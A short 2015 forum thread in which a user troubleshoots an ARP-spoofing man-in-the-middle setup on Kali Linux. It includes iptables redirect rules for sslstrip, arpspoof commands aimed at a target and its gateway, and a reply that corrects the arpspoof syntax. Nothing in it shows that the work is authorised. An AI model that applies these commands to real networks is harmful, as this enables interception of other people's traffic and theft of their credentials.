shamwow Posted June 27, 2015 Share Posted June 27, 2015 ARP Spoof not working. It delivers a DoS instead. What am I doin' wrong? In Kali Linux: iptables --flushiptables --table nat --flushiptables --delete-chainiptables --table nat --delete-chain echo "1" > /proc/sys/net/ipv4/ip_forwarding iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 Quote Link to comment Share on other sites More sharing options...
shamwow Posted June 28, 2015 Author Share Posted June 28, 2015 arpspoof -i wlan0 -r 192.168.0.2(target) -t 192.168.0.1(gateway) Quote Link to comment Share on other sites More sharing options...
cooper Posted June 28, 2015 Share Posted June 28, 2015 Check the man page for arpspoof and try again. It should probably be something like: arpspoof -i wlan0 -t 192.168.0.2 192.168.0.1 Quote Link to comment Share on other sites More sharing options...
shamwow Posted June 28, 2015 Author Share Posted June 28, 2015 I tried that but the webpage won't load. Maybe the problem is with sslstrip2 and not arpspoof. Check the man page for arpspoof and try again. It should probably be something like: arpspoof -i wlan0 -t 192.168.0.2 192.168.0.1 Quote Link to comment Share on other sites More sharing options...
cooper Posted June 28, 2015 Share Posted June 28, 2015 As always: One step at a time. When shit fails, go back to where things work as expected and, one step at a time, change the configuration to more closely resemble the situation you want to end up with. That way when things fail you know what change cause the failure meaning you should have some idea as to where to look for a solution. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.